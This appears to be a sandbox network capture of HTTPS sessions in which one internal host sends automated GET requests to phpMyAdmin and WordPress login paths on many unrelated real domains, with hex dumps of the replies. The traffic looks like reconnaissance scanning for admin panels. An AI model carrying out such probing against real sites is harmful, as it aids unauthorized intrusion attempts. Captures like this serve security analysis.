2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 5f 66 69 67 75 72 65 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 77 72 61 70 70 65 72 20 20 20 76 63 5f 62 6f 78 5f 62 6f 72 64 65 72 5f 67 72 65 79 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 30 31 22 20 68 65 69 67 68 74 3d 22 35 35 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 69 63 6f 6e 73 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 69 6d 67 20 61 74 74 61 63 68 6d 65 6e 74 2d 66 75 6c 6c 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: _figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="301" height="55" src="https://www.glazing-bt.com/wp-content/uploads/glazing-icons.png" class="vc_single_image-img attachment-full" alt="" loading="lazy" srcset="https://www
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: c3 a9 72 65 72 20 64 65 73 20 70 72 6f 66 65 73 73 69 6f 6e 6e 65 6c 73 20 64 75 20 6d c3 a9 74 69 65 72 20 64 75 20 76 69 74 72 61 67 65 20 61 75 74 6f 75 72 20 64 e2 80 99 75 6e 65 20 65 6e 73 65 69 67 6e 65 20 6e 61 74 69 6f 6e 61 6c 65 2e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0d 0a 66 66 66 38 0d 0a 0a 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 77 70 62 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 20 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 76 63 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 77 70 62 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 20 77 70 62 5f 66 61 64 65 49 6e 20 66 61 64 65 49 6e 20 76 63 5f Data Ascii: rer des professionnels du mtier du vitrage autour dune enseigne nationale.</span></strong></span></p></div></div>fff8<div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeIn fadeIn vc_
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2e 6a 70 67 20 35 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 32 37 30 78 33 30 30 2e 6a 70 67 20 32 37 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 31 33 32 78 31 34 36 2e 6a 70 67 20 31 33 32 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e Data Ascii: -content/uploads/glazing-valeurs.jpg 500w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-270x300.jpg 270w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-132x146.jpg 132w, https://www.glazing-bt.com/wp-content/uploads/glazin

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.6	64273	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jsklPy/pefJJkEUtnhpYzCnYVlsCWoVopURJxr01MpvJKd8Mk7lZvbC5zndSbo/iSC5ssocP8JTeobnxjv1cEQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:15 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.6	64181	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:16 UTC	6192	IN	Data Raw: 31 38 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1823<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.6	64402	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	165	OUT	GET /pma/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HvGc5HseCvDpxpvFc8XbVarcGfbzx789R0vgZ1Vr2JXjAR0Wqv5mYAdBmoyXj3pdoMHfTiHvFB2Zw5LrAHPq0w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:15 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.6	64352	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:15 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.6	64890	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	812	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5yXa%2F0SCu0ui7z%2BT1GQxC2klTWr5bayRhbW6Da%2Fq%2BkmvSccQAvaUc%2BiCHj66HmBb5mmQFoLhnu4KtPuw4o68ohsFP92b%2Bp%2FgStJVhYVEwKXHm68x7buttArKvF8LKLrq6JmqU5zj0srkDw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a8375e8814328-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:16 UTC	557	IN	Data Raw: 31 61 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a06<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:16 UTC	1369	IN	Data Raw: 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 Data Ascii: rel='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' typ
2024-02-20 23:26:16 UTC	1369	IN	Data Raw: 68 31 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 Data Ascii: h1><a href="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><inpu
2024-02-20 23:26:16 UTC	1369	IN	Data Raw: 76 61 6c 75 65 3d 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 Data Ascii: value="1" /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_a
2024-02-20 23:26:16 UTC	1369	IN	Data Raw: 76 65 72 3d 33 2e 31 2e 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 Data Ascii: ver=3.1.2" id="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="
2024-02-20 23:26:16 UTC	637	IN	Data Raw: 75 6e 64 65 72 73 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d Data Ascii: underscore-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-
2024-02-20 23:26:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.6	64946	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	168	OUT	GET /pma/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_OleTow5qCH621reD/hVAT0lNIzsD4ub+LZb0s1AqUtoPa2a4+3/a4WJDXjhd4mMlEpYUkIG2M8yfQhb+2Z3AmQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:16 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.6	64750	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
